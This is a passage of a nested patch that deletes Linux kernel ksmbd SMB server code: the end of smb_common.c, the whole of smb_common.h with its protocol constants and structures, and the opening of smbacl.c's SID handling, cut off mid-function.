+-
+-	neg_rsp->hdr.WordCount = 1;
+-	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
+-	neg_rsp->ByteCount = 0;
+-	return 0;
+-}
+-
+-int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	int ret;
+-
+-	conn->dialect =
+-		ksmbd_negotiate_smb_dialect(work->request_buf);
+-	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+-
+-	if (command == SMB2_NEGOTIATE_HE) {
+-		ret = smb2_handle_negotiate(work);
+-		return ret;
+-	}
+-
+-	if (command == SMB_COM_NEGOTIATE) {
+-		if (__smb2_negotiate(conn)) {
+-			init_smb3_11_server(conn);
+-			init_smb2_neg_rsp(work);
+-			ksmbd_debug(SMB, "Upgrade to SMB2 negotiation\n");
+-			return 0;
+-		}
+-		return smb_handle_negotiate(work);
+-	}
+-
+-	pr_err("Unknown SMB negotiation command: %u\n", command);
+-	return -EINVAL;
+-}
+-
+-enum SHARED_MODE_ERRORS {
+-	SHARE_DELETE_ERROR,
+-	SHARE_READ_ERROR,
+-	SHARE_WRITE_ERROR,
+-	FILE_READ_ERROR,
+-	FILE_WRITE_ERROR,
+-	FILE_DELETE_ERROR,
+-};
+-
+-static const char * const shared_mode_errors[] = {
+-	"Current access mode does not permit SHARE_DELETE",
+-	"Current access mode does not permit SHARE_READ",
+-	"Current access mode does not permit SHARE_WRITE",
+-	"Desired access mode does not permit FILE_READ",
+-	"Desired access mode does not permit FILE_WRITE",
+-	"Desired access mode does not permit FILE_DELETE",
+-};
+-
+-static void smb_shared_mode_error(int error, struct ksmbd_file *prev_fp,
+-				  struct ksmbd_file *curr_fp)
+-{
+-	ksmbd_debug(SMB, "%s\n", shared_mode_errors[error]);
+-	ksmbd_debug(SMB, "Current mode: 0x%x Desired mode: 0x%x\n",
+-		    prev_fp->saccess, curr_fp->daccess);
+-}
+-
+-int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp)
+-{
+-	int rc = 0;
+-	struct ksmbd_file *prev_fp;
+-
+-	/*
+-	 * Lookup fp in master fp list, and check desired access and
+-	 * shared mode between previous open and current open.
+-	 */
+-	read_lock(&curr_fp->f_ci->m_lock);
+-	list_for_each_entry(prev_fp, &curr_fp->f_ci->m_fp_list, node) {
+-		if (file_inode(filp) != file_inode(prev_fp->filp))
+-			continue;
+-
+-		if (filp == prev_fp->filp)
+-			continue;
+-
+-		if (ksmbd_stream_fd(prev_fp) && ksmbd_stream_fd(curr_fp))
+-			if (strcmp(prev_fp->stream.name, curr_fp->stream.name))
+-				continue;
+-
+-		if (prev_fp->attrib_only != curr_fp->attrib_only)
+-			continue;
+-
+-		if (!(prev_fp->saccess & FILE_SHARE_DELETE_LE) &&
+-		    curr_fp->daccess & FILE_DELETE_LE) {
+-			smb_shared_mode_error(SHARE_DELETE_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		/*
+-		 * Only check FILE_SHARE_DELETE if stream opened and
+-		 * normal file opened.
+-		 */
+-		if (ksmbd_stream_fd(prev_fp) && !ksmbd_stream_fd(curr_fp))
+-			continue;
+-
+-		if (!(prev_fp->saccess & FILE_SHARE_READ_LE) &&
+-		    curr_fp->daccess & (FILE_EXECUTE_LE | FILE_READ_DATA_LE)) {
+-			smb_shared_mode_error(SHARE_READ_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		if (!(prev_fp->saccess & FILE_SHARE_WRITE_LE) &&
+-		    curr_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE)) {
+-			smb_shared_mode_error(SHARE_WRITE_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		if (prev_fp->daccess & (FILE_EXECUTE_LE | FILE_READ_DATA_LE) &&
+-		    !(curr_fp->saccess & FILE_SHARE_READ_LE)) {
+-			smb_shared_mode_error(FILE_READ_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		if (prev_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE) &&
+-		    !(curr_fp->saccess & FILE_SHARE_WRITE_LE)) {
+-			smb_shared_mode_error(FILE_WRITE_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		if (prev_fp->daccess & FILE_DELETE_LE &&
+-		    !(curr_fp->saccess & FILE_SHARE_DELETE_LE)) {
+-			smb_shared_mode_error(FILE_DELETE_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-	}
+-	read_unlock(&curr_fp->f_ci->m_lock);
+-
+-	return rc;
+-}
+-
+-bool is_asterisk(char *p)
+-{
+-	return p && p[0] == '*';
+-}
+-
+-int ksmbd_override_fsids(struct ksmbd_work *work)
+-{
+-	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_share_config *share = work->tcon->share_conf;
+-	struct cred *cred;
+-	struct group_info *gi;
+-	unsigned int uid;
+-	unsigned int gid;
+-
+-	uid = user_uid(sess->user);
+-	gid = user_gid(sess->user);
+-	if (share->force_uid != KSMBD_SHARE_INVALID_UID)
+-		uid = share->force_uid;
+-	if (share->force_gid != KSMBD_SHARE_INVALID_GID)
+-		gid = share->force_gid;
+-
+-	cred = prepare_kernel_cred(NULL);
+-	if (!cred)
+-		return -ENOMEM;
+-
+-	cred->fsuid = make_kuid(&init_user_ns, uid);
+-	cred->fsgid = make_kgid(&init_user_ns, gid);
+-
+-	gi = groups_alloc(0);
+-	if (!gi) {
+-		abort_creds(cred);
+-		return -ENOMEM;
+-	}
+-	set_groups(cred, gi);
+-	put_group_info(gi);
+-
+-	if (!uid_eq(cred->fsuid, GLOBAL_ROOT_UID))
+-		cred->cap_effective = cap_drop_fs_set(cred->cap_effective);
+-
+-	WARN_ON(work->saved_cred);
+-	work->saved_cred = override_creds(cred);
+-	if (!work->saved_cred) {
+-		abort_creds(cred);
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+-
+-void ksmbd_revert_fsids(struct ksmbd_work *work)
+-{
+-	const struct cred *cred;
+-
+-	WARN_ON(!work->saved_cred);
+-
+-	cred = current_cred();
+-	revert_creds(work->saved_cred);
+-	put_cred(cred);
+-	work->saved_cred = NULL;
+-}
+-
+-__le32 smb_map_generic_desired_access(__le32 daccess)
+-{
+-	if (daccess & FILE_GENERIC_READ_LE) {
+-		daccess |= cpu_to_le32(GENERIC_READ_FLAGS);
+-		daccess &= ~FILE_GENERIC_READ_LE;
+-	}
+-
+-	if (daccess & FILE_GENERIC_WRITE_LE) {
+-		daccess |= cpu_to_le32(GENERIC_WRITE_FLAGS);
+-		daccess &= ~FILE_GENERIC_WRITE_LE;
+-	}
+-
+-	if (daccess & FILE_GENERIC_EXECUTE_LE) {
+-		daccess |= cpu_to_le32(GENERIC_EXECUTE_FLAGS);
+-		daccess &= ~FILE_GENERIC_EXECUTE_LE;
+-	}
+-
+-	if (daccess & FILE_GENERIC_ALL_LE) {
+-		daccess |= cpu_to_le32(GENERIC_ALL_FLAGS);
+-		daccess &= ~FILE_GENERIC_ALL_LE;
+-	}
+-
+-	return daccess;
+-}
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+deleted file mode 100644
+index 78c44978a906a..0000000000000
+--- a/fs/ksmbd/smb_common.h
++++ /dev/null
+@@ -1,468 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __SMB_COMMON_H__
+-#define __SMB_COMMON_H__
+-
+-#include <linux/kernel.h>
+-
+-#include "glob.h"
+-#include "nterr.h"
+-#include "../smbfs_common/smb2pdu.h"
+-#include "smb2pdu.h"
+-
+-/* ksmbd's Specific ERRNO */
+-#define ESHARE			50000
+-
+-#define SMB1_PROT		0
+-#define SMB2_PROT		1
+-#define SMB21_PROT		2
+-/* multi-protocol negotiate request */
+-#define SMB2X_PROT		3
+-#define SMB30_PROT		4
+-#define SMB302_PROT		5
+-#define SMB311_PROT		6
+-#define BAD_PROT		0xFFFF
+-
+-#define SMB1_VERSION_STRING	"1.0"
+-#define SMB20_VERSION_STRING	"2.0"
+-#define SMB21_VERSION_STRING	"2.1"
+-#define SMB30_VERSION_STRING	"3.0"
+-#define SMB302_VERSION_STRING	"3.02"
+-#define SMB311_VERSION_STRING	"3.1.1"
+-
+-#define SMB_ECHO_INTERVAL	(60 * HZ)
+-
+-#define CIFS_DEFAULT_IOSIZE	(64 * 1024)
+-#define MAX_CIFS_SMALL_BUFFER_SIZE 448 /* big enough for most */
+-
+-#define MAX_STREAM_PROT_LEN	0x00FFFFFF
+-
+-/* Responses when opening a file. */
+-#define F_SUPERSEDED	0
+-#define F_OPENED	1
+-#define F_CREATED	2
+-#define F_OVERWRITTEN	3
+-
+-/*
+- * File Attribute flags
+- */
+-#define ATTR_POSIX_SEMANTICS		0x01000000
+-#define ATTR_BACKUP_SEMANTICS		0x02000000
+-#define ATTR_DELETE_ON_CLOSE		0x04000000
+-#define ATTR_SEQUENTIAL_SCAN		0x08000000
+-#define ATTR_RANDOM_ACCESS		0x10000000
+-#define ATTR_NO_BUFFERING		0x20000000
+-#define ATTR_WRITE_THROUGH		0x80000000
+-
+-/* List of FileSystemAttributes - see 2.5.1 of MS-FSCC */
+-#define FILE_SUPPORTS_SPARSE_VDL	0x10000000 /* faster nonsparse extend */
+-#define FILE_SUPPORTS_BLOCK_REFCOUNTING	0x08000000 /* allow ioctl dup extents */
+-#define FILE_SUPPORT_INTEGRITY_STREAMS	0x04000000
+-#define FILE_SUPPORTS_USN_JOURNAL	0x02000000
+-#define FILE_SUPPORTS_OPEN_BY_FILE_ID	0x01000000
+-#define FILE_SUPPORTS_EXTENDED_ATTRIBUTES 0x00800000
+-#define FILE_SUPPORTS_HARD_LINKS	0x00400000
+-#define FILE_SUPPORTS_TRANSACTIONS	0x00200000
+-#define FILE_SEQUENTIAL_WRITE_ONCE	0x00100000
+-#define FILE_READ_ONLY_VOLUME		0x00080000
+-#define FILE_NAMED_STREAMS		0x00040000
+-#define FILE_SUPPORTS_ENCRYPTION	0x00020000
+-#define FILE_SUPPORTS_OBJECT_IDS	0x00010000
+-#define FILE_VOLUME_IS_COMPRESSED	0x00008000
+-#define FILE_SUPPORTS_REMOTE_STORAGE	0x00000100
+-#define FILE_SUPPORTS_REPARSE_POINTS	0x00000080
+-#define FILE_SUPPORTS_SPARSE_FILES	0x00000040
+-#define FILE_VOLUME_QUOTAS		0x00000020
+-#define FILE_FILE_COMPRESSION		0x00000010
+-#define FILE_PERSISTENT_ACLS		0x00000008
+-#define FILE_UNICODE_ON_DISK		0x00000004
+-#define FILE_CASE_PRESERVED_NAMES	0x00000002
+-#define FILE_CASE_SENSITIVE_SEARCH	0x00000001
+-
+-#define FILE_READ_DATA        0x00000001  /* Data can be read from the file   */
+-#define FILE_WRITE_DATA       0x00000002  /* Data can be written to the file  */
+-#define FILE_APPEND_DATA      0x00000004  /* Data can be appended to the file */
+-#define FILE_READ_EA          0x00000008  /* Extended attributes associated   */
+-/* with the file can be read        */
+-#define FILE_WRITE_EA         0x00000010  /* Extended attributes associated   */
+-/* with the file can be written     */
+-#define FILE_EXECUTE          0x00000020  /*Data can be read into memory from */
+-/* the file using system paging I/O */
+-#define FILE_DELETE_CHILD     0x00000040
+-#define FILE_READ_ATTRIBUTES  0x00000080  /* Attributes associated with the   */
+-/* file can be read                 */
+-#define FILE_WRITE_ATTRIBUTES 0x00000100  /* Attributes associated with the   */
+-/* file can be written              */
+-#define DELETE                0x00010000  /* The file can be deleted          */
+-#define READ_CONTROL          0x00020000  /* The access control list and      */
+-/* ownership associated with the    */
+-/* file can be read                 */
+-#define WRITE_DAC             0x00040000  /* The access control list and      */
+-/* ownership associated with the    */
+-/* file can be written.             */
+-#define WRITE_OWNER           0x00080000  /* Ownership information associated */
+-/* with the file can be written     */
+-#define SYNCHRONIZE           0x00100000  /* The file handle can waited on to */
+-/* synchronize with the completion  */
+-/* of an input/output request       */
+-#define GENERIC_ALL           0x10000000
+-#define GENERIC_EXECUTE       0x20000000
+-#define GENERIC_WRITE         0x40000000
+-#define GENERIC_READ          0x80000000
+-/* In summary - Relevant file       */
+-/* access flags from CIFS are       */
+-/* file_read_data, file_write_data  */
+-/* file_execute, file_read_attributes*/
+-/* write_dac, and delete.           */
+-
+-#define SET_FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA \
+-		| FILE_READ_ATTRIBUTES \
+-		| DELETE | READ_CONTROL | WRITE_DAC \
+-		| WRITE_OWNER | SYNCHRONIZE)
+-#define SET_FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
+-		| FILE_WRITE_EA \
+-		| FILE_DELETE_CHILD \
+-		| FILE_WRITE_ATTRIBUTES \
+-		| DELETE | READ_CONTROL | WRITE_DAC \
+-		| WRITE_OWNER | SYNCHRONIZE)
+-#define SET_FILE_EXEC_RIGHTS (FILE_READ_EA | FILE_WRITE_EA | FILE_EXECUTE \
+-		| FILE_READ_ATTRIBUTES \
+-		| FILE_WRITE_ATTRIBUTES \
+-		| DELETE | READ_CONTROL | WRITE_DAC \
+-		| WRITE_OWNER | SYNCHRONIZE)
+-
+-#define SET_MINIMUM_RIGHTS (FILE_READ_EA | FILE_READ_ATTRIBUTES \
+-		| READ_CONTROL | SYNCHRONIZE)
+-
+-/* generic flags for file open */
+-#define GENERIC_READ_FLAGS	(READ_CONTROL | FILE_READ_DATA | \
+-		FILE_READ_ATTRIBUTES | \
+-		FILE_READ_EA | SYNCHRONIZE)
+-
+-#define GENERIC_WRITE_FLAGS	(READ_CONTROL | FILE_WRITE_DATA | \
+-		FILE_WRITE_ATTRIBUTES | FILE_WRITE_EA | \
+-		FILE_APPEND_DATA | SYNCHRONIZE)
+-
+-#define GENERIC_EXECUTE_FLAGS	(READ_CONTROL | FILE_EXECUTE | \
+-		FILE_READ_ATTRIBUTES | SYNCHRONIZE)
+-
+-#define GENERIC_ALL_FLAGS	(DELETE | READ_CONTROL | WRITE_DAC | \
+-		WRITE_OWNER | SYNCHRONIZE | FILE_READ_DATA | \
+-		FILE_WRITE_DATA | FILE_APPEND_DATA | \
+-		FILE_READ_EA | FILE_WRITE_EA | \
+-		FILE_EXECUTE | FILE_DELETE_CHILD | \
+-		FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES)
+-
+-#define SMB1_PROTO_NUMBER		cpu_to_le32(0x424d53ff)
+-#define SMB_COM_NEGOTIATE		0x72
+-#define SMB1_CLIENT_GUID_SIZE		(16)
+-
+-#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
+-
+-#define SMBFLG2_IS_LONG_NAME	cpu_to_le16(0x40)
+-#define SMBFLG2_EXT_SEC		cpu_to_le16(0x800)
+-#define SMBFLG2_ERR_STATUS	cpu_to_le16(0x4000)
+-#define SMBFLG2_UNICODE		cpu_to_le16(0x8000)
+-
+-struct smb_hdr {
+-	__be32 smb_buf_length;
+-	__u8 Protocol[4];
+-	__u8 Command;
+-	union {
+-		struct {
+-			__u8 ErrorClass;
+-			__u8 Reserved;
+-			__le16 Error;
+-		} __packed DosError;
+-		__le32 CifsError;
+-	} __packed Status;
+-	__u8 Flags;
+-	__le16 Flags2;          /* note: le */
+-	__le16 PidHigh;
+-	union {
+-		struct {
+-			__le32 SequenceNumber;  /* le */
+-			__u32 Reserved; /* zero */
+-		} __packed Sequence;
+-		__u8 SecuritySignature[8];      /* le */
+-	} __packed Signature;
+-	__u8 pad[2];
+-	__le16 Tid;
+-	__le16 Pid;
+-	__le16 Uid;
+-	__le16 Mid;
+-	__u8 WordCount;
+-} __packed;
+-
+-struct smb_negotiate_req {
+-	struct smb_hdr hdr;     /* wct = 0 */
+-	__le16 ByteCount;
+-	unsigned char DialectsArray[1];
+-} __packed;
+-
+-struct smb_negotiate_rsp {
+-	struct smb_hdr hdr;     /* wct = 17 */
+-	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
+-	__le16 ByteCount;
+-} __packed;
+-
+-struct filesystem_attribute_info {
+-	__le32 Attributes;
+-	__le32 MaxPathNameComponentLength;
+-	__le32 FileSystemNameLen;
+-	__le16 FileSystemName[1]; /* do not have to save this - get subset? */
+-} __packed;
+-
+-struct filesystem_device_info {
+-	__le32 DeviceType;
+-	__le32 DeviceCharacteristics;
+-} __packed; /* device info level 0x104 */
+-
+-struct filesystem_vol_info {
+-	__le64 VolumeCreationTime;
+-	__le32 SerialNumber;
+-	__le32 VolumeLabelSize;
+-	__le16 Reserved;
+-	__le16 VolumeLabel[1];
+-} __packed;
+-
+-struct filesystem_info {
+-	__le64 TotalAllocationUnits;
+-	__le64 FreeAllocationUnits;
+-	__le32 SectorsPerAllocationUnit;
+-	__le32 BytesPerSector;
+-} __packed;     /* size info, level 0x103 */
+-
+-#define EXTENDED_INFO_MAGIC 0x43667364	/* Cfsd */
+-#define STRING_LENGTH 28
+-
+-struct fs_extended_info {
+-	__le32 magic;
+-	__le32 version;
+-	__le32 release;
+-	__u64 rel_date;
+-	char    version_string[STRING_LENGTH];
+-} __packed;
+-
+-struct object_id_info {
+-	char objid[16];
+-	struct fs_extended_info extended_info;
+-} __packed;
+-
+-struct file_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	char FileName[1];
+-} __packed;   /* level 0x101 FF resp data */
+-
+-struct file_names_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le32 FileNameLength;
+-	char FileName[1];
+-} __packed;   /* level 0xc FF resp data */
+-
+-struct file_full_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize;
+-	char FileName[1];
+-} __packed; /* level 0x102 FF resp */
+-
+-struct file_both_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* length of the xattrs */
+-	__u8   ShortNameLength;
+-	__u8   Reserved;
+-	__u8   ShortName[24];
+-	char FileName[1];
+-} __packed; /* level 0x104 FFrsp data */
+-
+-struct file_id_both_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* length of the xattrs */
+-	__u8   ShortNameLength;
+-	__u8   Reserved;
+-	__u8   ShortName[24];
+-	__le16 Reserved2;
+-	__le64 UniqueId;
+-	char FileName[1];
+-} __packed;
+-
+-struct file_id_full_dir_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* EA size */
+-	__le32 Reserved;
+-	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
+-	char FileName[1];
+-} __packed; /* level 0x105 FF rsp data */
+-
+-struct smb_version_values {
+-	char		*version_string;
+-	__u16		protocol_id;
+-	__le16		lock_cmd;
+-	__u32		capabilities;
+-	__u32		max_read_size;
+-	__u32		max_write_size;
+-	__u32		max_trans_size;
+-	__u32		max_credits;
+-	__u32		large_lock_type;
+-	__u32		exclusive_lock_type;
+-	__u32		shared_lock_type;
+-	__u32		unlock_lock_type;
+-	size_t		header_size;
+-	size_t		max_header_size;
+-	size_t		read_rsp_size;
+-	unsigned int	cap_unix;
+-	unsigned int	cap_nt_find;
+-	unsigned int	cap_large_files;
+-	__u16		signing_enabled;
+-	__u16		signing_required;
+-	size_t		create_lease_size;
+-	size_t		create_durable_size;
+-	size_t		create_durable_v2_size;
+-	size_t		create_mxac_size;
+-	size_t		create_disk_id_size;
+-	size_t		create_posix_size;
+-};
+-
+-struct filesystem_posix_info {
+-	/* For undefined recommended transfer size return -1 in that field */
+-	__le32 OptimalTransferSize;  /* bsize on some os, iosize on other os */
+-	__le32 BlockSize;
+-	/* The next three fields are in terms of the block size.
+-	 * (above). If block size is unknown, 4096 would be a
+-	 * reasonable block size for a server to report.
+-	 * Note that returning the blocks/blocksavail removes need
+-	 * to make a second call (to QFSInfo level 0x103 to get this info.
+-	 * UserBlockAvail is typically less than or equal to BlocksAvail,
+-	 * if no distinction is made return the same value in each
+-	 */
+-	__le64 TotalBlocks;
+-	__le64 BlocksAvail;       /* bfree */
+-	__le64 UserBlocksAvail;   /* bavail */
+-	/* For undefined Node fields or FSID return -1 */
+-	__le64 TotalFileNodes;
+-	__le64 FreeFileNodes;
+-	__le64 FileSysIdentifier;   /* fsid */
+-	/* NB Namelen comes from FILE_SYSTEM_ATTRIBUTE_INFO call */
+-	/* NB flags can come from FILE_SYSTEM_DEVICE_INFO call   */
+-} __packed;
+-
+-struct smb_version_ops {
+-	u16 (*get_cmd_val)(struct ksmbd_work *swork);
+-	int (*init_rsp_hdr)(struct ksmbd_work *swork);
+-	void (*set_rsp_status)(struct ksmbd_work *swork, __le32 err);
+-	int (*allocate_rsp_buf)(struct ksmbd_work *work);
+-	int (*set_rsp_credits)(struct ksmbd_work *work);
+-	int (*check_user_session)(struct ksmbd_work *work);
+-	int (*get_ksmbd_tcon)(struct ksmbd_work *work);
+-	bool (*is_sign_req)(struct ksmbd_work *work, unsigned int command);
+-	int (*check_sign_req)(struct ksmbd_work *work);
+-	void (*set_sign_rsp)(struct ksmbd_work *work);
+-	int (*generate_signingkey)(struct ksmbd_session *sess, struct ksmbd_conn *conn);
+-	int (*generate_encryptionkey)(struct ksmbd_conn *conn, struct ksmbd_session *sess);
+-	bool (*is_transform_hdr)(void *buf);
+-	int (*decrypt_req)(struct ksmbd_work *work);
+-	int (*encrypt_resp)(struct ksmbd_work *work);
+-};
+-
+-struct smb_version_cmds {
+-	int (*proc)(struct ksmbd_work *swork);
+-};
+-
+-int ksmbd_min_protocol(void);
+-int ksmbd_max_protocol(void);
+-
+-int ksmbd_lookup_protocol_idx(char *str);
+-
+-int ksmbd_verify_smb_message(struct ksmbd_work *work);
+-bool ksmbd_smb_request(struct ksmbd_conn *conn);
+-
+-int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
+-
+-void ksmbd_init_smb_server(struct ksmbd_work *work);
+-
+-struct ksmbd_kstat;
+-int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
+-				      int info_level,
+-				      struct ksmbd_file *dir,
+-				      struct ksmbd_dir_info *d_info,
+-				      char *search_pattern,
+-				      int (*fn)(struct ksmbd_conn *,
+-						int,
+-						struct ksmbd_dir_info *,
+-						struct ksmbd_kstat *));
+-
+-int ksmbd_extract_shortname(struct ksmbd_conn *conn,
+-			    const char *longname,
+-			    char *shortname);
+-
+-int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command);
+-
+-int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp);
+-int ksmbd_override_fsids(struct ksmbd_work *work);
+-void ksmbd_revert_fsids(struct ksmbd_work *work);
+-
+-unsigned int ksmbd_server_side_copy_max_chunk_count(void);
+-unsigned int ksmbd_server_side_copy_max_chunk_size(void);
+-unsigned int ksmbd_server_side_copy_max_total_size(void);
+-bool is_asterisk(char *p);
+-__le32 smb_map_generic_desired_access(__le32 daccess);
+-
+-static inline unsigned int get_rfc1002_len(void *buf)
+-{
+-	return be32_to_cpu(*((__be32 *)buf)) & 0xffffff;
+-}
+-
+-static inline void inc_rfc1001_len(void *buf, int count)
+-{
+-	be32_add_cpu((__be32 *)buf, count);
+-}
+-#endif /* __SMB_COMMON_H__ */
+diff --git a/fs/ksmbd/smbacl.c b/fs/ksmbd/smbacl.c
+deleted file mode 100644
+index b05ff9b146b55..0000000000000
+--- a/fs/ksmbd/smbacl.c
++++ /dev/null
+@@ -1,1436 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1+
+-/*
+- *   Copyright (C) International Business Machines  Corp., 2007,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *   Copyright (C) 2020 Samsung Electronics Co., Ltd.
+- *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <linux/string.h>
+-#include <linux/mnt_idmapping.h>
+-
+-#include "smbacl.h"
+-#include "smb_common.h"
+-#include "server.h"
+-#include "misc.h"
+-#include "mgmt/share_config.h"
+-
+-static const struct smb_sid domain = {1, 4, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(21), cpu_to_le32(1), cpu_to_le32(2), cpu_to_le32(3),
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* security id for everyone/world system group */
+-static const struct smb_sid creator_owner = {
+-	1, 1, {0, 0, 0, 0, 0, 3}, {0} };
+-/* security id for everyone/world system group */
+-static const struct smb_sid creator_group = {
+-	1, 1, {0, 0, 0, 0, 0, 3}, {cpu_to_le32(1)} };
+-
+-/* security id for everyone/world system group */
+-static const struct smb_sid sid_everyone = {
+-	1, 1, {0, 0, 0, 0, 0, 1}, {0} };
+-/* security id for Authenticated Users system group */
+-static const struct smb_sid sid_authusers = {
+-	1, 1, {0, 0, 0, 0, 0, 5}, {cpu_to_le32(11)} };
+-
+-/* S-1-22-1 Unmapped Unix users */
+-static const struct smb_sid sid_unix_users = {1, 1, {0, 0, 0, 0, 0, 22},
+-		{cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-22-2 Unmapped Unix groups */
+-static const struct smb_sid sid_unix_groups = { 1, 1, {0, 0, 0, 0, 0, 22},
+-		{cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/*
+- * See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
+- */
+-
+-/* S-1-5-88 MS NFS and Apple style UID/GID/mode */
+-
+-/* S-1-5-88-1 Unix uid */
+-static const struct smb_sid sid_unix_NFS_users = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-5-88-2 Unix gid */
+-static const struct smb_sid sid_unix_NFS_groups = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-5-88-3 Unix mode */
+-static const struct smb_sid sid_unix_NFS_mode = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(3), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/*
+- * if the two SIDs (roughly equivalent to a UUID for a user or group) are
+- * the same returns zero, if they do not match returns non-zero.
+- */
+-int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid)
+-{
+-	int i;
+-	int num_subauth, num_sat, num_saw;
+-
+-	if (!ctsid || !cwsid)
+-		return 1;
+-
+-	/* compare the revision */
+-	if (ctsid->revision != cwsid->revision) {
+-		if (ctsid->revision > cwsid->revision)
+-			return 1;
+-		else
+-			return -1;
+-	}
+-
+-	/* compare all of the six auth values */
+-	for (i = 0; i < NUM_AUTHS; ++i) {
+-		if (ctsid->authority[i] != cwsid->authority[i]) {
+-			if (ctsid->authority[i] > cwsid->authority[i])
+-				return 1;
+-			else
+-				return -1;
+-		}
+-	}
+-
+-	/* compare all of the subauth values if any */
+-	num_sat = ctsid->num_subauth;
+-	num_saw = cwsid->num_subauth;
+-	num_subauth = num_sat < num_saw ? num_sat : num_saw;
+-	if (num_subauth) {
+-		for (i = 0; i < num_subauth; ++i) {
+-			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
+-				if (le32_to_cpu(ctsid->sub_auth[i]) >
+-				    le32_to_cpu(cwsid->sub_auth[i]))
+-					return 1;
+-				else
+-					return -1;
+-			}
+-		}
+-	}
+-
+-	return 0; /* sids compare/match */
+-}
+-
+-static void smb_copy_sid(struct smb_sid *dst, const struct smb_sid *src)
+-{
+-	int i;
+-
+-	dst->revision = src->revision;
+-	dst->num_subauth = min_t(u8, src->num_subauth, SID_MAX_SUB_AUTHORITIES);
+-	for (i = 0; i < NUM_AUTHS; ++i)
+-		dst->authority[i] = src->authority[i];
+-	for (i = 0; i < dst->num_subauth; ++i)
